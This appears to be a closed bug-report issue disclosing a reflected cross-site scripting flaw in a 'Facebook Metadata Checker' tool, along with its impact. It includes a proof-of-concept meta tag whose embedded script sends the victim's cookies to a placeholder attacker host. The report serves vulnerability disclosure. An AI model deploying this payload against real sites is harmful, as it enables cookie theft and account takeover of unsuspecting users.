Possible Reflected Cross Site Scripting Detected

Question

Possible Reflected Cross Site Scripting Detected

Closed this issue 3 years ago · 0 comments

Reflected Cross Site Scripting Possibly Found

Looks like there is a Reflected XSS vulnerability in the section "Facebook Metadata Checker".
There's no sanitizing on the metadata content that comes from the checked website. It makes possible to an attacker to write a malicious code and, with some social engineering, contact an user. When the user opens the given URL, his cookies and credentials get stolen by the hacker.

The meta script that I used:


<meta  property="og:description"  content="Here the script will get the cookies and send to the attacker's server using XMLHttpRequest. <script>const xhttp=new XMLHttpRequest(); xhttp.open('GET', 'https://evilsite.example.com/steal?cookies='+document.cookie); xhttp.send()</script>">

Impact

An attacker could use social engineering to send a link to an user and then execute javascript in his page. Executing javascript on the user's page, the attacker can steal cookies, information and modify the html.

Ps: Modifying the HTML the attacker can ask the user for personal and sensible data and steal it.